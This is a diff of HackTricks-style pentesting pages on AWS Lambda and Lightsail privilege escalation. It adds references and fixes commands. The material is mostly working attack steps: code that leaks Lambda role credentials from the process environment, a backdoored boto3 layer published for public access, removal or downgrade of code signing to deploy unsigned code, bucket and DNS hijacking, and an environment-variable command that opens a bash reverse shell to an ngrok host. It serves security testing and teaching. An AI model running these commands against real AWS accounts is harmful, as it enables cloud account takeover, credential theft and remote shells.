 You could also **abuse the lambda role permissions** from the lambda function itself.\
-If the lambda role had enough permissions you could use it to grant admin rights to you:
+If the lambda role had enough permissions you could use it to grant admin rights to you:<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```python
 import boto3
@@ -62,15 +60,15 @@ def lambda_handler(event, context):
     return response
 ```
 
-It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda.
+It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```python
 def handler(event, context):
-    sessiontoken = open('/proc/self/environ', "r").read()
-    return {
-        'statusCode': 200,
-        'session': str(sessiontoken)
-    }
+    sessiontoken = open('/proc/self/environ', "r").read()
+    return {
+        'statusCode': 200,
+        'session': str(sessiontoken)
+    }
 ```
 
 ```bash
@@ -78,14 +76,14 @@ aws lambda invoke --function-name <lambda_name> output.txt
 cat output.txt
 ```
 
-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 > [!CAUTION]
-> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction`
+> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction`.<sup>[[6]](#references)</sup>
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
 
-Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`**
+Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`**.<sup>[[7]](#references)</sup>
 
 ```bash
 # Check the previous exploit and use the following line to grant you the invoke permissions
@@ -93,14 +91,14 @@ aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_
    --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
 ```
 
-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
 
 Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\
 They can create a **Lambda function with malicious code and assign it an existing IAM role**.
 
-Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role.
+Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role.<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws lambda create-function --function-name my_function \
@@ -134,39 +132,40 @@ aws dynamodb put-item --table-name my_table \
     --item Test={S="Random string"}
 ```
 
-**Potential Impact:** Direct privesc to the lambda service role specified.
+**Potential Impact:** Direct privesc to the lambda service role specified.<sup>[[1]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ### `lambda:AddPermission`
 
-An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource):
+An attacker with this permission can add a statement to a Lambda function's resource-based policy. For functions, this is primarily useful for granting invocation access; it does **not** grant identity-based management permissions such as `lambda:UpdateFunctionCode`.<sup>[[7]](#references)[[30]](#references)</sup>
 
 ```bash
-# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
-aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
+# Give your principal permission to invoke the function
+aws lambda add-permission --function-name <func_name> --statement-id invoke-privesc \
+    --action lambda:InvokeFunction --principal <your-principal-arn>
 
 # Invoke the function
 aws lambda invoke --function-name <func_name> /tmp/outout
 ```
 
-**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it.
+**Potential Impact:** Invoke a function that was not previously accessible. Privilege escalation depends on whether attacker-controlled input can make the existing function disclose data or perform a sensitive action; invocation alone does not expose the execution-role credentials or allow code modification.<sup>[[7]](#references)[[30]](#references)</sup>
 
 ### `lambda:AddLayerVersionPermission`
 
-An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information
+An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information.<sup>[[8]](#references)[[22]](#references)</sup>
 
 ```bash
 # Give everyone the permission lambda:GetLayerVersion
 aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
 ```
 
-**Potential Impact:** Potential access to sensitive information.
+**Potential Impact:** Potential access to sensitive information.<sup>[[8]](#references)[[22]](#references)</sup>
 
 ### `lambda:UpdateFunctionCode`
 
 Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\
-The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**.
+The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**.<sup>[[1]](#references)[[4]](#references)[[11]](#references)</sup>
 
-Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code.
+Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code.<sup>[[1]](#references)[[11]](#references)</sup>
 
 ```bash
 # The zip should contain the lambda code (trick: Download the current one and add your code there)
@@ -179,19 +178,19 @@ aws lambda invoke --function-name my_function output.txt
 # If not check if it's exposed in any URL or via an API gateway you could access
 ```
 
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potential Impact:** Direct privesc to the lambda service role used.<sup>[[1]](#references)[[4]](#references)[[11]](#references)</sup>
 
 ### `lambda:UpdateFunctionConfiguration`
 
 #### RCE via env variables
 
-With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands:
+With this permission, an attacker can change a function's environment variables. If the function starts a Python process, the `PYTHONWARNINGS`/`BROWSER` chain below can hand an attacker-controlled command to that process: `PYTHONWARNINGS` is processed as Python warning filters, dotted warning categories cause module imports, `antigravity` calls `webbrowser.open`, and `webbrowser` treats `BROWSER` entries containing `%s` as browser command templates. This behavior is runtime- and image-dependent, so validate it against the target function before relying on it.<sup>[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
 ```
 
-For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in:
+For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in:<sup>[[17]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html
@@ -199,9 +198,9 @@ https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-esc
 
 #### RCE via Lambda Layers
 
-[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**.
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allow you to include **code** in your Lambda function while **storing it separately**, so the function code can stay small and **several functions can share code**.<sup>[[18]](#references)</sup>
 
-Inside lambda you can check the paths from where python code is loaded with a function like the following:
+Inside Lambda you can check the paths from which Python code is loaded with a function like the following.<sup>[[19]](#references)</sup>
 
 ```python
 import json
@@ -211,7 +210,7 @@ def lambda_handler(event, context):
     print(json.dumps(sys.path, indent=2))
 ```
 
-These are the places:
+The exact order varies by runtime. The following is the Python 3.7 example retained from the original layer-priority research; current runtimes can use different paths and should be checked with `sys.path`:<sup>[[2]](#references)[[19]](#references)[[20]](#references)</sup>
 
 1. /var/task
 2. /opt/python/lib/python3.7/site-packages
@@ -224,36 +223,39 @@ These are the places:
 9. /opt/python/lib/python3.7/site-packages
 10. /opt/python
 
-For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
+In that Python 3.7 example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).<sup>[[2]](#references)</sup>
 
 #### Exploitation
 
-It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.
+It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a Lambda function. To execute arbitrary code, this layer needs to contain a **library that the Lambda is going to import**. If you can read the code of the Lambda, you could find this easily; it might also be possible that the Lambda is **already using a layer** that you could **download** and modify.<sup>[[2]](#references)[[18]](#references)[[19]](#references)[[22]](#references)</sup>
 
-For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
-
-```bash
-pip3 install -t ./lambda_layer boto3
-```
-
-You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
-
-Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
-Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**
+For example, suppose that the Lambda is using the library boto3; this creates a local layer with the latest version of the library.<sup>[[2]](#references)[[20]](#references)</sup>
 
 ```bash
-aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
+mkdir -p ./lambda_layer/python
+pip3 install -t ./lambda_layer/python boto3
 ```
 
-Now, make the uploaded lambda layer **accessible by any account**:
+You can open `./lambda_layer/python/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
+
+Then, zip the top-level `python/` directory inside `./lambda_layer` and **upload the new Lambda layer** in your own account (or in the victim's account, but you might not have permissions for this).\
+The layer needs to be **compatible with the Python version** used by the Lambda and, if you upload it to your account, it needs to be in the **same Region**. A top-level `python/` directory is required so the package is loaded under `/opt/python`.<sup>[[2]](#references)[[18]](#references)[[20]](#references)[[21]](#references)</sup>
+
+```bash
+aws lambda publish-layer-version --layer-name "boto3" --zip-file fileb://backdoor.zip \
+    --compatible-architectures "<target-architecture>" \
+    --compatible-runtimes "<target-python-runtime>"
+```
+
+Now, make the uploaded lambda layer **accessible by any account**:<sup>[[8]](#references)[[22]](#references)</sup>
 
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
     --version-number 1 --statement-id public \
-    --action lambda:GetLayerVersion --principal *
+    --action lambda:GetLayerVersion --principal '*'
 ```
 
-And attach the lambda layer to the victim lambda function:
+And attach the lambda layer to the victim lambda function:<sup>[[12]](#references)[[18]](#references)[[21]](#references)</sup>
 
 ```bash
 aws lambda update-function-configuration \
@@ -262,7 +264,7 @@ aws lambda update-function-configuration \
     --timeout 300 #5min for rev shells
 ```
 
-The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method.
+The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method.<sup>[[2]](#references)</sup>
 
 A **more stealth way to exploit this vulnerability** can be found in:
 
@@ -270,7 +272,7 @@ A **more stealth way to exploit this vulnerability** can be found in:
 ../../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potential Impact:** Direct privesc to the lambda service role used.<sup>[[2]](#references)[[18]](#references)[[19]](#references)[[22]](#references)</sup>
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
 
@@ -284,26 +286,18 @@ Some lambdas are going to be **receiving sensitive info from the users in parame
 ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-## References
-
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
-
-
-
-
-
 
 ### `lambda:DeleteFunctionCodeSigningConfig` or `lambda:PutFunctionCodeSigningConfig` + `lambda:UpdateFunctionCode` — Bypass Lambda Code Signing
 
-If a Lambda function enforces code signing, an attacker who can either remove the Code Signing Config (CSC) or downgrade it to Warn can deploy unsigned code to the function. This bypasses integrity protections without modifying the function's IAM role or triggers.
+If a Lambda function enforces code signing, an attacker who can either remove the Code Signing Config (CSC) or downgrade it to Warn can deploy unsigned code to the function. This bypasses integrity protections without modifying the function's IAM role or triggers.<sup>[[23]](#references)[[24]](#references)[[25]](#references)[[26]](#references)</sup>
 
-Permissions (one of):
-- Path A: `lambda:DeleteFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
-- Path B: `lambda:CreateCodeSigningConfig`, `lambda:PutFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`
+The relevant Lambda IAM actions are:<sup>[[29]](#references)</sup>
+- Path A: `lambda:DeleteFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode` (and `lambda:GetFunctionCodeSigningConfig` for the optional precheck below).
+- Path B: `lambda:CreateCodeSigningConfig`, `lambda:PutFunctionCodeSigningConfig`, `lambda:UpdateFunctionCode`.
 
 Notes:
-- For Path B, you don't need an AWS Signer profile if the CSC policy is set to `WARN` (unsigned artifacts allowed).
+- A code-signing configuration created through Path B still requires an `AllowedPublishers` signing-profile version ARN. A `Warn` policy allows an unsigned deployment, but it does not remove that API input requirement.<sup>[[23]](#references)[[27]](#references)[[28]](#references)</sup>
+- If an existing `Warn` CSC is available, use its ARN and skip `CreateCodeSigningConfig`; the `PutFunctionCodeSigningConfig` call only needs the configuration ARN.<sup>[[23]](#references)[[26]](#references)</sup>
 
 Steps (REGION=us-east-1, TARGET_FN=<target-lambda-name>):
 
@@ -321,7 +315,7 @@ zip backdoor.zip handler.py
 Path A) Remove CSC then update code:
 
 ```bash
-aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION && HAS_CSC=1 || HAS_CSC=0
+aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION >/dev/null 2>&1 && HAS_CSC=1 || HAS_CSC=0
 if [ "$HAS_CSC" -eq 1 ]; then
   aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION
 fi
@@ -330,13 +324,18 @@ aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://ba
 aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
 ```
 
+If the handler name changes, the optional configuration update also requires `lambda:UpdateFunctionConfiguration`.<sup>[[12]](#references)[[29]](#references)</sup>
+
 Path B) Downgrade to Warn and update code (if delete not allowed):
 
 ```bash
+SIGNING_PROFILE_VERSION_ARN="<signing-profile-version-arn>"
 CSC_ARN=$(aws lambda create-code-signing-config \
   --description ht-warn-csc \
-  --code-signing-policies UntrustedArtifactOnDeployment=WARN \
+  --allowed-publishers "SigningProfileVersionArns=$SIGNING_PROFILE_VERSION_ARN" \
+  --code-signing-policies UntrustedArtifactOnDeployment=Warn \
   --query CodeSigningConfig.CodeSigningConfigArn --output text --region $REGION)
+# Alternatively set CSC_ARN to an existing Warn configuration ARN and skip the create call.
 aws lambda put-function-code-signing-config --function-name $TARGET_FN --code-signing-config-arn $CSC_ARN --region $REGION
 aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
 # If the handler name changed, also run:
@@ -350,11 +349,49 @@ aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/de
 cat /tmp/out.json
 ```
 
-Potential impact: Ability to push and run arbitrary unsigned code in a function that was supposed to enforce signed deployments, potentially leading to code execution with the function role's permissions.
+The verification command additionally requires `lambda:InvokeFunction`.<sup>[[6]](#references)</sup>
+
+Potential impact: Ability to push and run arbitrary unsigned code in a function that was supposed to enforce signed deployments, potentially leading to code execution with the function role's permissions.<sup>[[4]](#references)[[11]](#references)[[23]](#references)[[25]](#references)[[26]](#references)</sup>
 
 Cleanup:
 
 ```bash
 aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true
 ```
+
+The cleanup command detaches the code-signing configuration from the function.<sup>[[25]](#references)</sup>
+
+## References
+
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [AWS IAM Privilege Escalation - Methods and Mitigation - Part 2](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
+- [3] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [4] [Using source function ARN to control function access behavior - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/permissions-source-function-arn.html)
+- [5] [CreateFunction - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_CreateFunction.html)
+- [6] [Invoke - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_Invoke.html)
+- [7] [AddPermission - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_AddPermission.html)
+- [8] [AddLayerVersionPermission - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_AddLayerVersionPermission.html)
+- [9] [CreateEventSourceMapping - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_CreateEventSourceMapping.html)
+- [10] [Tutorial: Using AWS Lambda with Amazon DynamoDB streams](https://docs.aws.amazon.com/lambda/latest/dg/with-ddb-example.html)
+- [11] [UpdateFunctionCode - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html)
+- [12] [UpdateFunctionConfiguration - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionConfiguration.html)
+- [13] [Command line and environment - Python documentation](https://docs.python.org/3/using/cmdline.html#envvar-PYTHONWARNINGS)
+- [14] [warnings.py at 3.12 - CPython](https://raw.githubusercontent.com/python/cpython/3.12/Lib/warnings.py)
+- [15] [antigravity.py at 3.12 - CPython](https://github.com/python/cpython/blob/3.12/Lib/antigravity.py)
+- [16] [webbrowser — Convenient web-browser controller - Python documentation](https://docs.python.org/3/library/webbrowser.html)
+- [17] [macOS Process Abuse - HackTricks](https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html)
+- [18] [Managing Lambda dependencies with layers - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html)
+- [19] [Working with .zip file archives for Python Lambda functions - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/python-package.html)
+- [20] [Working with layers for Python Lambda functions - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/python-layers.html)
+- [21] [PublishLayerVersion - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_PublishLayerVersion.html)
+- [22] [Granting users access to a Lambda layer - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/permissions-user-layer.html)
+- [23] [Using code signing to verify code integrity with Lambda - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-codesigning.html)
+- [24] [Creating code signing configurations for Lambda - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-codesigning-create.html)
+- [25] [DeleteFunctionCodeSigningConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_DeleteFunctionCodeSigningConfig.html)
+- [26] [PutFunctionCodeSigningConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_PutFunctionCodeSigningConfig.html)
+- [27] [CreateCodeSigningConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_CreateCodeSigningConfig.html)
+- [28] [create-code-signing-config - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/create-code-signing-config.html)
+- [29] [Actions, resources, and condition keys for AWS Lambda](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awslambda.html)
+- [30] [Viewing resource-based IAM policies in Lambda - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Lightsail Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Lightsail
 
 For more information about Lightsail check:
@@ -11,67 +9,69 @@ For more information about Lightsail check:
 {{#endref}}
 
 > [!WARNING]
-> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.
+> Lightsail authorizes API calls with identity-based IAM policies and doesn’t support service roles. Some features use service-linked roles owned by Lightsail, whose permissions users cannot edit. These permissions therefore expose a path to Lightsail-hosted data or changes to network and DNS exposure rather than a user-controlled IAM-role assumption path.<sup>[[1]](#references)</sup>
+
+Sensitive data such as code, API keys, and database information may still be present in Lightsail instances, buckets, and databases.
 
 ### `lightsail:DownloadDefaultKeyPair`
 
-This permission will allow you to get the SSH keys to access the instances:
+This action downloads the regional default key pair; it also creates one if the Region does not already have one. The private key can be used to connect to instances configured with that default key.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```
 aws lightsail download-default-key-pair
 ```
 
-**Potential Impact:** Find sensitive info inside the instances.
+**Potential Impact:** Access sensitive information in instances that use the default key.<sup>[[2]](#references)</sup>
 
 ### `lightsail:GetInstanceAccessDetails`
 
-This permission will allow you to generate SSH keys to access the instances:
+This action returns temporary SSH keys for a specific instance.<sup>[[4]](#references)</sup>
 
 ```bash
 aws lightsail get-instance-access-details --instance-name <instance_name>
 ```
 
-**Potential Impact:** Find sensitive info inside the instances.
+**Potential Impact:** Access sensitive information in the instance using the returned credentials.<sup>[[4]](#references)</sup>
 
 ### `lightsail:CreateBucketAccessKey`
 
-This permission will allow you to get a key to access the bucket:
+This action creates an access key ID and secret access key that grant full programmatic access to the bucket and its objects.<sup>[[5]](#references)</sup>
 
 ```bash
 aws lightsail create-bucket-access-key --bucket-name <name>
 ```
 
-**Potential Impact:** Find sensitive info inside the bucket.
+**Potential Impact:** Read or write sensitive objects in the bucket.<sup>[[5]](#references)</sup>
 
 ### `lightsail:GetRelationalDatabaseMasterUserPassword`
 
-This permission will allow you to get the credentials to access the database:
+This action returns the current, previous, or pending version of a Lightsail database’s master-user password.<sup>[[6]](#references)</sup>
 
 ```bash
 aws lightsail get-relational-database-master-user-password --relational-database-name <name>
 ```
 
-**Potential Impact:** Find sensitive info inside the database.
+**Potential Impact:** Access sensitive information in the database.<sup>[[6]](#references)</sup>
 
 ### `lightsail:UpdateRelationalDatabase`
 
-This permission will allow you to change the password to access the database:
+This action updates database attributes, including the master-user password.<sup>[[7]](#references)</sup>
 
 ```bash
 aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
 ```
 
-If the database isn't public, you could also make it public with this permissions with
+If the database isn’t publicly accessible, this action can also make it available to resources outside the Lightsail account with `--publicly-accessible`.<sup>[[7]](#references)</sup>
 
 ```bash
 aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
 ```
 
-**Potential Impact:** Find sensitive info inside the database.
+**Potential Impact:** Expose or take over access to sensitive data in the database.<sup>[[7]](#references)</sup>
 
 ### `lightsail:OpenInstancePublicPorts`
 
-This permission allow to open ports to the Internet
+This permission opens public ports on an instance and specifies the IP addresses and protocol allowed to connect.<sup>[[8]](#references)</sup>
 
 ```bash
 aws lightsail open-instance-public-ports \
@@ -79,11 +79,11 @@ aws lightsail open-instance-public-ports \
     --port-info fromPort=22,protocol=TCP,toPort=22
 ```
 
-**Potential Impact:** Access sensitive ports.
+**Potential Impact:** Access sensitive services listening on the instance.<sup>[[8]](#references)</sup>
 
 ### `lightsail:PutInstancePublicPorts`
 
-This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it.
+This permission opens public ports on an instance and closes every currently open port not included in the request.<sup>[[9]](#references)</sup>
 
 ```bash
 aws lightsail put-instance-public-ports \
@@ -91,75 +91,97 @@ aws lightsail put-instance-public-ports \
     --port-infos fromPort=22,protocol=TCP,toPort=22
 ```
 
-**Potential Impact:** Access sensitive ports.
+**Potential Impact:** Access sensitive services listening on the instance.<sup>[[9]](#references)</sup>
 
 ### `lightsail:SetResourceAccessForBucket`
 
-This permissions allows to give an instances access to a bucket without any extra credentials
+This permission can grant a running or stopped Lightsail instance in the same Region access to a bucket and its objects without managing access keys.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ```bash
-aws set-resource-access-for-bucket \
+aws lightsail set-resource-access-for-bucket \
     --resource-name <instance-name> \
     --bucket-name <bucket-name> \
     --access allow
 ```
 
-**Potential Impact:** Potential new access to buckets with sensitive information.
+**Potential Impact:** The instance may gain read/write access to sensitive bucket objects.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ### `lightsail:UpdateBucket`
 
-With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone:
+This permission updates bucket public accessibility and the AWS accounts that can access a bucket.<sup>[[12]](#references)</sup>
 
 ```bash
-# Grant read access to exterenal account
-aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
+# Grant read-only access to an external account
+aws lightsail update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
 
-# Grant read to the public
-aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
+# Grant read access to the public
+aws lightsail update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
 
-# Bucket private but single objects can be public
-aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
+# Keep the bucket private while allowing individual objects to be public
+aws lightsail update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
 ```
 
-**Potential Impact:** Potential new access to buckets with sensitive information.
+With `getObject=public`, all objects are publicly readable; with `getObject=private,allowPublicOverrides=true`, individual objects can still be made public-read.<sup>[[12]](#references)</sup>
+
+**Potential Impact:** Grant unauthorized read access to sensitive bucket objects.<sup>[[12]](#references)</sup>
 
 ### `lightsail:UpdateContainerService`
 
-With this permissions an attacker could grant access to private ECRs from the containers service
+This permission can activate the Lightsail container service’s ECR image-puller role. A private ECR repository must also authorize that role, so activating it alone does not guarantee repository access.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ```bash
-aws update-container-service \
+aws lightsail update-container-service \
     --service-name <name> \
-    --private-registry-access ecrImagePullerRole={isActive=boolean}
+    --private-registry-access ecrImagePullerRole={isActive=true}
 ```
 
-**Potential Impact:** Get sensitive information from private ECR
+**Potential Impact:** If the repository trusts the role, access private ECR images that may contain sensitive information.<sup>[[14]](#references)</sup>
 
 ### `lightsail:CreateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
+This permission can create DNS records in a Lightsail DNS zone. An attacker could add an A record for a subdomain or the apex that points to an attacker-controlled IP, or add a TXT record containing an SPF policy that authorizes attacker-controlled hosts. Depending on DNS delegation and downstream validation, these changes can enable subdomain takeover, domain impersonation, or email spoofing.<sup>[[15]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 aws lightsail create-domain-entry \
+    --region us-east-1 \
     --domain-name example.com \
     --domain-entry name=dev.example.com,type=A,target=192.0.2.0
 ```
 
-**Potential Impact:** Takeover a domain
+**Potential Impact:** Domain/DNS hijacking or email impersonation, subject to DNS delegation and downstream validation.<sup>[[15]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ### `lightsail:UpdateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
+This permission updates an existing DNS recordset. An attacker could update an A record to point a subdomain or the apex to an attacker-controlled IP, or update a TXT record containing an SPF policy; the command below includes the existing record’s ID (`id`) to identify the entry.<sup>[[16]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 aws lightsail update-domain-entry \
+    --region us-east-1 \
     --domain-name example.com \
